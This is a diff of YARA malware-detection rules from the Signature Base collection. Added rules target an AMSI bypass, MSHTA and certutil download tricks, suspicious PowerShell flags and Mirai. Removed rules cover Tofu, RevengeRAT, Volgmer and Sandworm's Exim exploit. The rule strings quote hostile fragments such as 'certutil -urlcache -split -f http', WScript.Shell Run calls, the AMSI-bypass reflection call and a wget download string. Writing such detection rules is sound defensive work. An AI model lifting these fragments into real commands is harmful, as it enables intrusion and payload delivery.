+		logic_hash = "87188c6cbb7d89c25faafb297a7c0e52321c661c84cdefd5604785c687190fcd"
+		score = 65
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "\";function Main(){for(var " ascii
-		$s2 = "=String.fromCharCode(parseInt(" ascii
-		$s3 = "));(new Function(" ascii
+		$s1 = ".GetField('amsiContext',[Reflection.BindingFlags]'NonPublic,Static')." ascii nocase
 
 	condition:
-		filesize < 500KB and all of them
+		1 of them
 }
-rule SIGNATURE_BASE_Tofu_Backdoor
+rule SIGNATURE_BASE_JS_Suspicious_Obfuscation_Dropbox
 {
 	meta:
-		description = "Detects Tofu Trojan"
-		author = "Cylance"
-		id = "03848366-f139-5352-959d-390992d96296"
-		date = "2017-02-28"
+		description = "Detects PowerShell AMSI Bypass"
+		author = "Florian Roth (Nextron Systems)"
+		id = "9b6b288d-3a15-5267-bbb1-885febf4df78"
+		date = "2017-07-19"
 		modified = "2023-12-05"
-		reference = "https://www.cylance.com/en_us/blog/the-deception-project-a-new-japanese-centric-threat.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_ham_tofu_chches.yar#L11-L24"
+		reference = "https://twitter.com/ItsReallyNick/status/887705105239343104"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_mal_scripts.yar#L19-L33"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "67c49456dbe4dc4c8bc54139ce6d493ea5588392d8c64010d029d7a63ac7f976"
-		score = 75
+		logic_hash = "19d1dd25c4a5e18dca131709a64c3537278754ec9d67b0bb49bde9b1493d3dc7"
+		score = 70
 		quality = 85
 		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$a = "Cookies: Sym1.0"
-		$b = "\\\\.\\pipe\\1[12345678]"
-		$c = {66 0F FC C1 0F 11 40 D0 0F 10 40 D0 66 0F EF C2 0F 11 40 D0 0F 10 40 E0}
+		$x1 = "j\"+\"a\"+\"v\"+\"a\"+\"s\"+\"c\"+\"r\"+\"i\"+\"p\"+\"t\""
+		$x2 = "script:https://www.dropbox.com" ascii
 
 	condition:
-		$a or $b or $c
+		2 of them
 }
-rule SIGNATURE_BASE_Revengerat_Sep17 : FILE
+rule SIGNATURE_BASE_JS_Suspicious_MSHTA_Bypass
 {
 	meta:
-		description = "Detects RevengeRAT malware"
+		description = "Detects MSHTA Bypass"
 		author = "Florian Roth (Nextron Systems)"
-		id = "7e58af06-a0ce-532c-9483-b1eca5e3cc28"
-		date = "2017-09-04"
-		modified = "2020-07-27"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_revenge_rat.yar#L11-L34"
+		id = "b2ddca78-c19a-5bb6-a1c9-4413e637ab1d"
+		date = "2017-07-19"
+		modified = "2023-12-05"
+		reference = "https://twitter.com/ItsReallyNick/status/887705105239343104"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_mal_scripts.yar#L35-L50"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "467133402d6898f325cfd8c18308fc2a4dafd06c8624f9347225f16afd4035ce"
-		score = 75
+		logic_hash = "df68cac0da19c5705353f26fc3f2a99556b7230f9d4f52e7a2e35cb48997b699"
+		score = 70
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "2a86a4b2dcf1657bcb2922e70fc787aa9b66ec1c26dc2119f669bd2ce3f2e94a"
-		hash2 = "7c271484c11795876972aabeb277c7b3035f896c9e860a852d69737df6e14213"
-		hash3 = "fe00c4f9c8439eea50b44f817f760d8107f81e2dba7f383009fde508ff4b8967"
 
 	strings:
-		$x1 = "Nuclear Explosion.g.resources" fullword ascii
-		$x4 = "5B1EE7CAD3DFF220A95D1D6B91435D9E1520AC41" fullword ascii
-		$x5 = "\\RevengeRAT\\" ascii
-		$x6 = "Revenge-RAT client has been successfully installed." ascii
-		$x7 = "Nuclear Explosion.exe" fullword ascii
-		$x8 = " Revenge-RAT 201" wide
-		$s1 = "{11111-22222-20001-00001}" fullword wide
+		$s1 = "mshtml,RunHTMLApplication" ascii
+		$s2 = "new ActiveXObject(\"WScript.Shell\").Run(" ascii
+		$s3 = "/c start mshta j" ascii nocase
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 500KB and 1 of ( $x* ) ) or ( 3 of them )
+		2 of them
 }
-rule SIGNATURE_BASE_SUSP_Vulndriver_HP_Hardware_Diagnostics_Etdsupp_May23 : FILE
+rule SIGNATURE_BASE_Javascript_Run_Suspicious
 {
 	meta:
-		description = "Detects vulnerable versions of the HP Hardware Diagnostics driver (etdsupp.sys) based on PE metadata info"
-		author = "X__Junior (Nextron Systems)"
-		id = "8f838e4f-3e3e-5131-9d67-e49f6848bb37"
-		date = "2023-05-12"
+		description = "Detects a suspicious Javascript Run command"
+		author = "Florian Roth (Nextron Systems)"
+		id = "87f98ead-3052-5777-8877-574619173aaa"
+		date = "2017-08-23"
 		modified = "2023-12-05"
-		reference = "https://github.com/alfarom256/HPHardwareDiagnostics-PoC/tree/main/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/susp_vulndriver_hp_hardware_diagnostics_etdsupp_may23.yar#L1-L16"
+		reference = "https://twitter.com/craiu/status/900314063560998912"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_mal_scripts.yar#L52-L66"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "f744abb99c97d98e4cd08072a897107829d6d8481aee96c22443f626d00f4145"
-		logic_hash = "bb50f591e49b1b0b08ccbe4ca5cb3685d8f358e51e6d6f77677bc05701f6b301"
-		score = 65
-		quality = 60
-		tags = "FILE"
+		logic_hash = "39d2292d3749c63780dc7ca7a2414ba02e2b0e1edec7ec6a16b42aba2c44c23a"
+		score = 60
+		quality = 85
+		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = {4f 00 72 00 69 00 67 00 69 00 6e 00 61 00 6c 00 46 00 69 00 6c 00 65 00 6e 00 61 00 6d 00 65 00 00 00 65 00 74 00 64 00 73 00 75 00 70 00 70 00 2e 00 73 00 79 00 73 00}
-		$s2 = "etdsupp.pdb"
-		$s3 = /V\x00S\x00_\x00V\x00E\x00R\x00S\x00I\x00O\x00N\x00_\x00I\x00N\x00F\x00O\x00\x00\x00{0,4}\xbd\x04\xef\xfe[\x00-\xff]{4}([\x00-\xff]{2}[\x00-\x11]\x00[\x00-\xff]{4}|\x00\x00\x12\x00\x00\x00\x00\x00)/
+		$s1 = "w = new ActiveXObject(" ascii
+		$s2 = " w.Run(r);" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and int16 ( uint32( 0x3C ) + 0x5c ) == 0x0001 and filesize < 100KB and all of them
+		all of them
 }
-rule SIGNATURE_BASE_TA17_318B_Volgmer : FILE
+rule SIGNATURE_BASE_Certutil_Decode_OR_Download : FILE
 {
 	meta:
-		description = "Malformed User Agent in Volgmer malware"
-		author = "US CERT"
-		id = "20a7f64b-0fee-5235-ac91-2fc811497ac6"
-		date = "2017-11-15"
-		modified = "2023-12-05"
-		reference = "https://www.us-cert.gov/ncas/alerts/TA17-318B"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_ta17_318B.yar#L9-L20"
+		description = "Certutil Decode"
+		author = "Florian Roth (Nextron Systems)"
+		id = "63bdefd2-225a-56d5-b615-5e236c97f050"
+		date = "2017-08-29"
+		modified = "2023-10-19"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_mal_scripts.yar#L70-L93"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "2b3a7e501214767b7d79b33fb560b5611fa3726036a0c98d6f1904a55f306e40"
-		score = 75
+		logic_hash = "5640dcfedc028cc40b0376d328758b504eb1ff860da94648b435eadb760d9724"
+		score = 40
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s = "Mozillar/"
+		$a1 = "certutil -decode " ascii wide
+		$a2 = "certutil  -decode " ascii wide
+		$a3 = "certutil.exe -decode " ascii wide
+		$a4 = "certutil.exe  -decode " ascii wide
+		$a5 = "certutil -urlcache -split -f http" ascii wide
+		$a6 = "certutil.exe -urlcache -split -f http" ascii wide
+		$fp_msi = { 52 00 6F 00 6F 00 74 00 20 00 45 00 6E 00 74 00 72 00 79 }
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint16( uint32( 0x3c ) ) == 0x4550 ) and $s
+		filesize < 700KB and 1 of ( $a* ) and not 1 of ( $fp* )
 }
-
-rule SIGNATURE_BASE_Volgmer_Malware : FILE
+rule SIGNATURE_BASE_Suspicious_JS_Script_Content : FILE
 {
 	meta:
-		description = "Detects Volgmer malware as reported in US CERT TA17-318B"
+		description = "Detects suspicious statements in JavaScript files"
 		author = "Florian Roth (Nextron Systems)"
-		id = "a8df5f70-69e7-5c95-8af7-7dda6bb9c77a"
-		date = "2017-11-15"
+		id = "6a547aa5-c58c-5559-9d3f-3f0d541eafd4"
+		date = "2017-12-02"
 		modified = "2023-12-05"
-		reference = "https://www.us-cert.gov/ncas/alerts/TA17-318B"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_ta17_318B.yar#L34-L71"
+		reference = "Research on Leviathan https://goo.gl/MZ7dRg"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_mal_scripts.yar#L95-L112"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "898c2734c56a40aa4d24c1eac2dfb7dd1f98b0bdf7a11ab518eef282becb84b6"
-		score = 75
+		logic_hash = "1dbc1a266d710a70a77c81d5b872d0d324423250a9f34455faef53ac4c41b5f2"
+		score = 70
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "ff2eb800ff16745fc13c216ff6d5cc2de99466244393f67ab6ea6f8189ae01dd"
-		hash2 = "8fcd303e22b84d7d61768d4efa5308577a09cc45697f7f54be4e528bbb39435b"
-		hash3 = "eff3e37d0406c818e3430068d90e7ed2f594faa6bb146ab0a1c00a2f4a4809a5"
-		hash4 = "e40a46e95ef792cf20d5c14a9ad0b3a95c6252f96654f392b4bc6180565b7b11"
-		hash5 = "6dae368eecbcc10266bba32776c40d9ffa5b50d7f6199a9b6c31d40dfe7877d1"
-		hash6 = "fee0081df5ca6a21953f3a633f2f64b7c0701977623d3a4ec36fff282ffe73b9"
-		hash7 = "53e9bca505652ef23477e105e6985102a45d9a14e5316d140752df6f3ef43d2d"
-		hash8 = "1d0999ba3217cbdb0cc85403ef75587f747556a97dee7c2616e28866db932a0d"
+		hash1 = "fc0fad39b461eb1cfc6be57932993fcea94fca650564271d1b74dd850c81602f"
 
 	strings:
-		$x1 = "User-Agent: Mozillar/5.0" fullword ascii
-		$x2 = "[Cmd] - CMD_BOTCMD_CONNLOG_GET" fullword wide
-		$x3 = "[TestConnect To Bot] - Port = %d" fullword ascii
-		$x4 = "b50a338264226b6d57c1936d9db140ba74a28930270a083353645a9b518661f4fcea160d7" ascii
-		$s1 = "%sigfx%c%c%c.exe" fullword wide
-		$s2 = "H_%s_%016I64X_%04d%02d%02d%02d%02d%02d.TXT" fullword ascii
-		$s3 = "cmd.exe /c %s > %s 2>&1" fullword wide
-		$s4 = "%s\\dllcache\\%s.dll" fullword ascii
-		$s5 = "Cond Fail." fullword ascii
-		$s6 = "The %s %s%s" fullword ascii
-		$s7 = "%s \"%s\"%s \"%s\" %s \"%s\"" fullword ascii
-		$s8 = "DLL_Spider.dll" fullword ascii
+		$x1 = "new ActiveXObject('WScript.Shell')).Run('cmd /c " ascii
+		$x2 = ".Run('regsvr32 /s /u /i:" ascii
+		$x3 = "new ActiveXObject('WScript.Shell')).Run('regsvr32 /s" fullword ascii
+		$x4 = "args='/s /u /i:" ascii
 
 	condition:
-		filesize < 400KB and ( 1 of ( $x* ) or ( uint16( 0 ) == 0x5a4d and 2 of them ) ) or ( uint16( 0 ) == 0x5a4d and pe.imphash ( ) == "ea42395e901b33bad504798e0f0fd74b" )
+		( filesize < 10KB and 1 of them )
 }
-rule SIGNATURE_BASE_REGEORG_Tuneller_Generic : FILE
+rule SIGNATURE_BASE_Universal_Exploit_Strings : FILE
 {
 	meta:
-		description = "No description has been set in the source file - Signature Base"
-		author = "Mandiant"
-		id = "a87979b7-2732-5a32-b3f3-a815a58b6589"
-		date = "2021-12-20"
+		description = "Detects a group of strings often used in exploit codes"
+		author = "Florian Roth (Nextron Systems)"
+		id = "4b3a9eec-5f7c-579c-9719-fe23cc291aee"
+		date = "2017-12-02"
 		modified = "2023-12-05"
-		reference = "https://www.mandiant.com/resources/unc3524-eye-spy-email"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/webshell_regeorg.yar#L1-L20"
+		reference = "not set"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_mal_scripts.yar#L114-L131"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "ba22992ce835dadcd06bff4ab7b162f9"
-		logic_hash = "1657928875c3cd2d5bf774929b0497d78f0211b321f8a4138cc9b8c80b9f99d6"
-		score = 75
+		logic_hash = "6436a1cf6d0acc3162ec99c95ef20b3e6dd110c77d5a0b26ac790551316c0a69"
+		score = 50
 		quality = 85
 		tags = "FILE"
-		date_modified = "2021-12-20"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "9b07dacf8a45218ede6d64327c38478640ff17d0f1e525bd392c002e49fe3629"
 
 	strings:
-		$s1 = "System.Net.IPEndPoint"
-		$s2 = "Response.AddHeader"
-		$s3 = "Request.InputStream.Read"
-		$s4 = "Request.Headers.Get"
-		$s5 = "Response.Write"
-		$s6 = "System.Buffer.BlockCopy"
-		$s7 = "Response.BinaryWrite"
-		$s8 = "SocketException soex"
+		$s1 = "Exploit" fullword ascii
+		$s2 = "Payload" fullword ascii
+		$s3 = "CVE-201" ascii
+		$s4 = "bindshell"
 
 	condition:
-		filesize < 1MB and 7 of them
+		( filesize < 2KB and 3 of them )
 }
-rule SIGNATURE_BASE_APT_Sandworm_Keywords_May20_1 : CVE_2019_10149 FILE
+rule SIGNATURE_BASE_VBS_Obfuscated_Mal_Feb18_1 : FILE
 {
 	meta:
-		description = "Detects commands used by Sandworm group to exploit critical vulernability CVE-2019-10149 in Exim"
+		description = "Detects malicious obfuscated VBS observed in February 2018"
 		author = "Florian Roth (Nextron Systems)"
-		id = "e0d4e90e-5547-5487-8d0c-a141d88fff7c"
-		date = "2020-05-28"
+		id = "39ea10e5-9dea-5cc8-8388-15378fcbab60"
+		date = "2018-02-12"
 		modified = "2023-12-05"
-		reference = "https://media.defense.gov/2020/May/28/2002306626/-1/-1/0/CSA%20Sandworm%20Actors%20Exploiting%20Vulnerability%20in%20Exim%20Transfer%20Agent%2020200528.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_sandworm_exim_expl.yar#L2-L15"
+		reference = "https://goo.gl/zPsn83"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_mal_scripts.yar#L133-L155"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "9f9a81ff0c576f05ac063eaca7a5882dbdb09c9a0778610cca2864636a00efce"
+		logic_hash = "0bbd388a3103744df2434956c2b7ac12dacd72f9041b4cc014d31eec4115aedd"
 		score = 75
 		quality = 85
-		tags = "CVE-2019-10149, FILE"
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "06960cb721609fe5a857fe9ca3696a84baba88d06c20920370ddba1b0952a8ab"
+		hash2 = "c5c0e28093e133d03c3806da0061a35776eed47d351e817709d2235b95d3a036"
+		hash3 = "e1765a2b10e2ff10235762b9c65e9f5a4b3b47d292933f1a710e241fe0417a74"
 
 	strings:
-		$x1 = "MAIL FROM:<$(run("
-		$x2 = "exec\\x20\\x2Fusr\\x2Fbin\\x2Fwget\\x20\\x2DO\\x20\\x2D\\x20http"
+		$x1 = "A( Array( (1* 2^1 )+" ascii
+		$x2 = ".addcode(A( Array(" ascii
+		$x3 = "false:AA.send:Execute(AA.responsetext):end" ascii
+		$x4 = "& A( Array(  (1* 2^1 )+" ascii
+		$s1 = ".SYSTEMTYPE:NEXT:IF (UCASE(" ascii
+		$s2 = "A = STR:next:end function" ascii
+		$s3 = "&WSCRIPT.SCRIPTFULLNAME&CHR" fullword ascii
 
 	condition:
-		filesize < 8000KB and 1 of them
+		filesize < 600KB and ( 1 of ( $x* ) or 3 of them )
 }
-rule SIGNATURE_BASE_APT_Sandworm_SSH_Key_May20_1 : FILE
+rule SIGNATURE_BASE_Powershell_Susp_Parameter_Combo : HIGHVOL FILE
 {
 	meta:
-		description = "Detects SSH key used by Sandworm on exploited machines"
+		description = "Detects PowerShell invocation with suspicious parameters"
 		author = "Florian Roth (Nextron Systems)"
-		id = "ea2968b8-7ae4-56b8-9547-816c5e37c50a"
-		date = "2020-05-28"
-		modified = "2023-12-05"
-		reference = "https://media.defense.gov/2020/May/28/2002306626/-1/-1/0/CSA%20Sandworm%20Actors%20Exploiting%20Vulnerability%20in%20Exim%20Transfer%20Agent%2020200528.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_sandworm_exim_expl.yar#L17-L31"
+		id = "17c707f3-7f51-5772-9874-a96c220960a7"
+		date = "2017-03-12"
+		modified = "2025-12-16"
+		reference = "https://goo.gl/uAic1X"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_powershell_invocation.yar#L2-L77"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "23a43849dfaa80bad2ca4f46b53181b3a4855ee89673ae9b658c854069b9aaa9"
-		score = 75
-		quality = 85
-		tags = "FILE"
-		hash1 = "dc074464e50502459038ac127b50b8c68ed52817a61c2f97f0add33447c8f730"
-		hash2 = "538d713cb47a6b5ec6a3416404e0fc1ebcbc219a127315529f519f936420c80e"
+		logic_hash = "c359a1d2a460f2939a1dd0959687ed4fbc2d874e689b42ae4bc73ee05145cce3"
+		score = 60
+		quality = 31
+		tags = "HIGHVOL, FILE"
 
 	strings:
-		$x1 = "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC2q/NGN/brzNfJiIp2zswtL33tr74pIAjMeWtXN1p5Hqp5fTp058U1EN4NmgmjX0KzNjjV"
+		$sa1 = " -enc " ascii wide nocase
+		$sa2 = " -EncodedCommand " ascii wide nocase
+		$sa3 = " /enc " ascii wide nocase
+		$sa4 = " /EncodedCommand " ascii wide nocase
+		$sb1 = " -w hidden " ascii wide nocase
+		$sb2 = " -window hidden " ascii wide nocase
+		$sb3 = " -windowstyle hidden " ascii wide nocase
+		$sb4 = " /w hidden " ascii wide nocase
+		$sb5 = " /window hidden " ascii wide nocase
+		$sb6 = " /windowstyle hidden " ascii wide nocase
+		$sc1 = " -nop " ascii wide nocase
+		$sc2 = " -noprofile " ascii wide nocase
+		$sc3 = " /nop " ascii wide nocase
+		$sc4 = " /noprofile " ascii wide nocase
+		$sd1 = " -noni " ascii wide nocase
+		$sd2 = " -noninteractive " ascii wide nocase
+		$sd3 = " /noni " ascii wide nocase
+		$sd4 = " /noninteractive " ascii wide nocase
+		$se1 = " -ep bypass " ascii wide nocase
+		$se2 = " -exec bypass " ascii wide nocase
+		$se3 = " -executionpolicy bypass " ascii wide nocase
+		$se4 = " -exec bypass " ascii wide nocase
+		$se5 = " /ep bypass " ascii wide nocase
+		$se6 = " /exec bypass " ascii wide nocase
+		$se7 = " /executionpolicy bypass " ascii wide nocase
+		$se8 = " /exec bypass " ascii wide nocase
+		$sf1 = " -sta " ascii wide
+		$sf2 = " /sta " ascii wide
+		$fp1 = "Chocolatey Software" ascii wide
+		$fp2 = "VBOX_MSI_INSTALL_PATH" ascii wide
+		$fp3 = "\\Local\\Temp\\en-US.ps1" ascii wide
+		$fp4 = "Lenovo Vantage - Battery Gauge Helper" wide fullword
+		$fp5 = "\\LastPass\\lpwinmetro\\AppxUpgradeUwp.ps1" ascii
+		$fp6 = "# use the encoded form to mitigate quoting complications that full scriptblock transfer exposes" ascii
+		$fp7 = "Write-AnsibleLog \"INFO - s" ascii
+		$fp8 = "\\Packages\\Matrix42\\" ascii
+		$fp9 = "echo " ascii
+		$fp10 = "install" ascii fullword
+		$fp11 = "REM " ascii
+		$fp12 = "set /p " ascii
+		$fp13 = "rxScan Application" wide
+		$fp14 = "psutil.tests"
+		$fpa1 = "All Rights"
+		$fpa2 = "<html"
+		$fpa2b = "<HTML"
+		$fpa3 = "Copyright"
+		$fpa4 = "License"
+		$fpa5 = "<?xml"
+		$fpa6 = "Help" fullword
+		$fpa7 = "COPYRIGHT"
 
 	condition:
-		filesize < 1000KB and 1 of them
+		filesize < 3000KB and 4 of ( $s* ) and not 1 of ( $fp* ) and uint32be( 0 ) != 0x456C6646
 }
-rule SIGNATURE_BASE_APT_Sandworm_SSHD_Config_Modification_May20_1 : FILE
+rule SIGNATURE_BASE_Mirai_Botnet_Malware : FILE
 {
 	meta:
-		description = "Detects ssh config entry inserted by Sandworm on compromised machines"
+		description = "Detects Mirai Botnet Malware"
 		author = "Florian Roth (Nextron Systems)"
-		id = "dd60eeb7-3d4b-5a6a-8054-50c617ee8c73"
-		date = "2020-05-28"
-		modified = "2023-12-05"
-		reference = "https://media.defense.gov/2020/May/28/2002306626/-1/-1/0/CSA%20Sandworm%20Actors%20Exploiting%20Vulnerability%20in%20Exim%20Transfer%20Agent%2020200528.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_sandworm_exim_expl.yar#L33-L49"
+		id = "a678e9f7-d516-5bdb-962e-b9d39d8a64bb"
+		date = "2016-10-04"
+		modified = "2023-01-27"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_mirai.yar#L10-L50"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "5775588b3a9d44e9eb2c8ef0f50351d7e3b06f1005f669775fae7187900d5999"
+		logic_hash = "384f8377ca05296da1177a8939f526069fbad0bb73769bd282d81ea4d876003c"
 		score = 75
-		quality = 85
+		quality = 83
 		tags = "FILE"
-		hash1 = "dc074464e50502459038ac127b50b8c68ed52817a61c2f97f0add33447c8f730"
-		hash2 = "538d713cb47a6b5ec6a3416404e0fc1ebcbc219a127315529f519f936420c80e"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c"
+		hash2 = "05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c"
+		hash3 = "20683ff7a5fec1237fc09224af40be029b9548c62c693844624089af568c89d4"
+		hash4 = "2efa09c124f277be2199bee58f49fc0ce6c64c0bef30079dfb3d94a6de492a69"
+		hash5 = "420bf9215dfb04e5008c5e522eee9946599e2b323b17f17919cd802ebb012175"
+		hash6 = "62cdc8b7fffbaf5683a466f6503c03e68a15413a90f6afd5a13ba027631460c6"
+		hash7 = "70bb0ec35dd9afcfd52ec4e1d920e7045dc51dca0573cd4c753987c9d79405c0"
+		hash8 = "89570ae59462e6472b6769545a999bde8457e47ae0d385caaa3499ab735b8147"
+		hash9 = "bf0471b37dba7939524a30d7d5afc8fcfb8d4a7c9954343196737e72ea4e2dc4"
+		hash10 = "c61bf95146c68bfbbe01d7695337ed0e93ea759f59f651799f07eecdb339f83f"
+		hash11 = "d9573c3850e2ae35f371dff977fc3e5282a5e67db8e3274fd7818e8273fd5c89"
+		hash12 = "f1100c84abff05e0501e77781160d9815628e7fd2de9e53f5454dbcac7c84ca5"
+		hash13 = "fb713ccf839362bf0fbe01aedd6796f4d74521b133011b408e42c1fd9ab8246b"
 
 	strings:
-		$x1 = "AllowUsers mysql_db" ascii
-		$a1 = "ListenAddress" ascii fullword
+		$x1 = "POST /cdn-cgi/" ascii
+		$x2 = "/dev/misc/watchdog" fullword ascii
+		$x3 = "/dev/watchdog" ascii
+		$x5 = ".mdebug.abi32" fullword ascii
+		$s1 = "LCOGQGPTGP" fullword ascii
+		$s2 = "QUKLEKLUKVJOG" fullword ascii
+		$s3 = "CFOKLKQVPCVMP" fullword ascii
+		$s4 = "QWRGPTKQMP" fullword ascii
+		$s5 = "HWCLVGAJ" fullword ascii
+		$s6 = "NKQVGLKLE" fullword ascii
 
 	condition:
-		filesize < 10KB and all of them
+		uint16( 0 ) == 0x457f and filesize < 200KB and ( ( 1 of ( $x* ) and 1 of ( $s* ) ) or 4 of ( $s* ) )
 }
-rule SIGNATURE_BASE_APT_Sandworm_Initfile_May20_1 : FILE
+rule SIGNATURE_BASE_Mirai_1_May17 : FILE
 {
 	meta:
-		description = "Detects mysql init script used by Sandworm on compromised machines"
+		description = "Detects Mirai Malware"
 		author = "Florian Roth (Nextron Systems)"
-		id = "0bd613e3-6bd4-5cec-bc0d-2bdb83caf142"
-		date = "2020-05-28"
+		id = "ac85ee28-a01f-5c3d-a534-0c19a3dc92e7"
+		date = "2017-05-12"
 		modified = "2023-12-05"
-		reference = "https://media.defense.gov/2020/May/28/2002306626/-1/-1/0/CSA%20Sandworm%20Actors%20Exploiting%20Vulnerability%20in%20Exim%20Transfer%20Agent%2020200528.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_sandworm_exim_expl.yar#L51-L66"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_mirai.yar#L62-L78"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "989f37069820d9ecf67dc71e4761a7cde2c1adf8db40b5f8a47e9c610ddec2e6"
+		logic_hash = "6816ab3b455bbde6c4bb43bff162615d7fc24b9d5828faa190600387c38978e1"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "dc074464e50502459038ac127b50b8c68ed52817a61c2f97f0add33447c8f730"
-		hash2 = "538d713cb47a6b5ec6a3416404e0fc1ebcbc219a127315529f519f936420c80e"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash1 = "172d050cf0d4e4f5407469998857b51261c80209d9fa5a2f5f037f8ca14e85d2"
+		hash2 = "9ba8def84a0bf14f682b3751b8f7a453da2cea47099734a72859028155b2d39c"
+		hash3 = "a393449a5f19109160384b13d60bb40601af2ef5f08839b5223f020f1f83e990"
 
 	strings:
-		$s1 = "GRANT ALL PRIVILEGES ON * . * TO 'mysqldb'@'localhost';" ascii
-		$s2 = "CREATE USER 'mysqldb'@'localhost' IDENTIFIED BY '" ascii fullword
+		$s1 = "GET /bins/mirai.x86 HTTP/1.0" fullword ascii
 
 	condition:
-		filesize < 10KB and all of them
+		( uint16( 0 ) == 0x457f and filesize < 5000KB and all of them )
 }
-rule SIGNATURE_BASE_APT_Sandworm_User_May20_1 : FILE
+rule SIGNATURE_BASE_Miari_2_May17 : FILE
 {
 	meta:
-		description = "Detects user added by Sandworm on compromised machines"
+		description = "Detects Mirai Malware"
 		author = "Florian Roth (Nextron Systems)"
-		id = "ada549a4-abcc-5c0a-9601-75631e78c835"
-		date = "2020-05-28"
+		id = "1c2cc98d-8ca5-5055-8f86-7f85c046ccd9"
+		date = "2017-05-12"
 		modified = "2023-12-05"
-		reference = "https://media.defense.gov/2020/May/28/2002306626/-1/-1/0/CSA%20Sandworm%20Actors%20Exploiting%20Vulnerability%20in%20Exim%20Transfer%20Agent%2020200528.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_sandworm_exim_expl.yar#L68-L84"
+		reference = "Internal Research"
